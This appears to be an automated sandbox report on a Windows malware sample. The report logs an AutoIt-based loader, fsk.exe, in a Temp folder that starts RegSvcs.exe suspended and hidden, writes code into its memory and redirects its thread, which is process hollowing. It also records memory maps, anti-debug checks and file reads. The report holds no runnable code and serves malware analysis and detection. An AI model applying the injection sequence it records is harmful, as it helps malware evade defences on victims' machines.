| File Name | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe |
| Command Line | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\ |
| Monitor | Start Time: 00:01:18, Reason: Child Process |
| Unmonitor | End Time: 00:01:21, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd0 |
| Parent PID | 0xbc0 (c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00081fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001d5fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00200fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00aeefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00b2ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x00b30000 | 0x00b6bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00b30fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b40fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b50fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00d17fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d20000 | 0x00d20000 | 0x00ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000eb0000 | 0x00eb0000 | 0x00f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x00fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x010d4fff | Private Memory | rw |
|
|
|
- |
| fsk.exe | 0x01140000 | 0x0121efff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001220000 | 0x01220000 | 0x0261ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02620000 | 0x028eefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x02ce2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ec0000 | 0x02ec0000 | 0x02f67fff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x74c90000 | 0x74ccafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74cd0000 | 0x74ce5fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74cf0000 | 0x74cfafff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74d00000 | 0x74d16fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74d20000 | 0x74d26fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74d30000 | 0x74d4bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74d50000 | 0x74eedfff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ef0000 | 0x74f21fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75050000 | 0x750cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x75220000 | 0x75231fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75290000 | 0x752a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x752f0000 | 0x752f8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75380000 | 0x75384fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x756c0000 | 0x7573afff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75740000 | 0x75875fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x758b0000 | 0x758e4fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x759e0000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x75a10000 | 0x75b04fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75f10000 | 0x7610afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76650000 | 0x7676cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77790000 | 0x77795fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000000fffb0000 | 0xfffb0000 | 0xfffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000fffdb000 | 0xfffdb000 | 0xfffddfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffde000 | 0xfffde000 | 0xfffdefff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffdf000 | 0xfffdf000 | 0xfffdffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffe0000 | 0xfffe0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (20)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | type = file_type |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | size = 65536, size_out = 65536 |
|
3 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | size = 65536, size_out = 23596 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | size = 40960, size_out = 0 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | size = 65536, size_out = 20 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | size = 61440, size_out = 0 |
|
2 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Control Panel\Mouse | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Mouse | value_name = SwapMouseButtons, data = 48 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | os_pid = 0xbd8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | os_tid = 0xbd4 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | os_tid = 0xbd4 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | os_tid = 0xbd4 |
|
1 |
Memory (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 172032 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | address = 0x400000, size = 512 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | address = 0x401000, size = 166912 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | address = 0x7efde008, size = 4 |
|
1 |
Module (67)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x76540000 |
|
5 | |
| Load | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\HFKMZ | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x76540000 |
|
14 | |
| Load | ntdll | base_address = 0x777c0000 |
|
5 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe, size = 32767 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76554f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7655359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76551252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76554208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76554d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x765d410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x765d4195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7655d31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7656ee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7780441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7782c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7782c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7656f088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x778105d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7782ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x777e0b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7789fde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77831e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x765d4761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x765ccd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x765d424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x765d46b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x765e6676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x765d4751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x765e65f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x765d47c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x765d47e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x765d47f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x7656eee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765610b5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x7656d650 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x7656d668 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64DisableWow64FsRedirection, address_out = 0x7656d650 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64RevertWow64FsRedirection, address_out = 0x7656d668 |
|
1 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | AutoIt v3 | class_name = AutoIt v3, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 |
System (14)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 750 milliseconds (0.750 seconds) |
|
2 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
9 | |
| Get Time | type = System Time, time = 2019-02-11 09:18:45 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | - |
|
1 |
Process #9: regsvcs.exe
45
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe |
| Command Line | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:25, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd8 |
| Parent PID | 0xbd0 (c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BDC
0x
BE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00024fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00083fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00169fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00183fff | Private Memory | rwx |
|
|
|
- |
| regsvcs.exe | 0x00190000 | 0x0019dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x001a0000 | 0x001bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001d9fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00429fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x007cbfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x00950fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x008b6fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00c62fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000c70000 | 0x00c70000 | 0x00df7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e00000 | 0x00e00000 | 0x00f80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f90000 | 0x00f90000 | 0x0238ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #8: c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | 0xbd4 | address = 0x400000, size = 512 |
|
1 | |
| Modify Memory | #8: c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | 0xbd4 | address = 0x401000, size = 166912 |
|
1 | |
| Modify Memory | #8: c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | 0xbd4 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Control Flow | #8: c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | 0xbd4 | os_tid = 0xbdc, address = 0x777d01c4 |
|
1 |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Windows\SysWOW64\systray.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | \??\C:\Windows\SysWOW64\ntdll.dll | type = extended |
|
1 | |
| Get Info | \??\C:\Windows\SysWOW64\ntdll.dll | type = extended |
|
1 | |
| Get Info | \??\C:\Windows\SysWOW64\systray.exe | type = extended |
|
1 | |
